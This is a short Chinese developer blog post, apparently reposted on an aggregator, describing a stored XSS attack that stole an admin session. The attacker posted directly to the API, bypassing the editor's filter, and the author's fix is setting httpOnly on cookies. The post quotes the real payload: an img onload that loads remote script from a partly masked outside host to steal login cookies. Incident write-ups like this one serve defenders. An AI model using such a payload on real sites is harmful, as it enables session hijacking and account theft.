xss-javascript被攻击系列--(一)
来源:互联网 发布:考勤系统怎么改数据 编辑:程序博客网 时间:2024/05/29 15:46
终于可以挤个空档,写写这些日子的惨痛经历。
某天产品A突然喊到,admin账号被盗了,导致金钱丢失了。瞬间头皮发麻,完蛋了。
赶紧排查可能出现漏洞的地方,在数据库中找到了攻击数据如下:
[p][img srC=\"/project//emotion/images/tsj/t_0004.gif\" onload=\"jQuery.getScript('https://x.****.com/kuF4')\"/][/p]
项目中有富文本编辑器,编辑器在提交时已经将脚本关键字过滤掉了。
god! 攻击者直接攻击接口,将恶意数据插入到了库里,在展示此页面的数据时必定会加载以及执行代码中的相关脚本。
分析下js脚本中的内容是直接窃取用户登录cookies的。
去看项目相关cookies,没有设置httpOnly,这样用户登录信息对所有站点脚本就是完全公开的,攻击者拿到cookies轻而易举。攻击内容中添加有吸引力的内容,用户去访问有问题网页的概率会大大增加,用户丢失信息是必然。
服务器端补上了httpOnly属性,这个洞算是堵上了。
可脚本还是会执行这个问题得解决呀,怎么办呢?下一篇继续
有什么好的建议,多多交流哟。
阅读全文
0 0
- xss-javascript被攻击系列--(一)
- xss-javascript被攻击系列--(二)
- XSS与CSRF攻击相关知识(一) XSS
- XSS第四节,XSS攻击实例(一)
- XSS跨站脚本攻击(一)
- web攻击手段(一)XSS
- XSS攻击(二)
- XSS攻击
- XSS攻击
- XSS攻击
- XSS攻击
- XSS攻击
- XSS攻击
- xss攻击
- XSS攻击
- XSS攻击
- XSS攻击
- xss攻击
- 常用正则表达式
- opencv--形态学操作
- iview-excel导入数据库数据
- LNMP应用之搭建个人博客
- Codeforces Round #452 (Div. 2) A-C
- xss-javascript被攻击系列--(一)
- Spring Security 系列教程-Hello World
- win64下安装配置eclipse+MySQL+Tomcat(转载)
- 初识数组与指针
- 1037. 在霍格沃茨找零钱(20)
- 基于openssl的https client例子
- HTML如何做出分割线效果
- LoadRunner12学习之路(1-5)
- 线程池的知识点